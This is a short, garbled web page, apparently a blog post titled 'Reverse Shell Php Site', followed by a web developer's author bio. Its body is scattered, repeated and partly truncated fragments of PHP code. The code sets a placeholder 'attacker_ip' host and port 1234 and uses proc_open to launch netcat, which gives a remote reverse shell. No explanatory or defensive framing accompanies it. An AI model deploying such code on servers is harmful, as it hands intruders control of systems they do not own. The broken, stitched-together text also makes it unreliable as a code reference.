Skip to main content

Reverse Shell Php Site

$process = proc_open("nc $host $port", $descriptorspec, $pipes);

<?php $host = 'attacker_ip'; $port = 1234; Reverse Shell Php

$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open("nc $host $port"

Farhad Moghadamsalimi

Hey, I’m Farhad. I’m an entrepreneur, Blockchain and AI enthusiast, and web developer living in Turkey. I am a fan of entrepreneurship, writing, and reading about Technology and philosophy.

Leave a Reply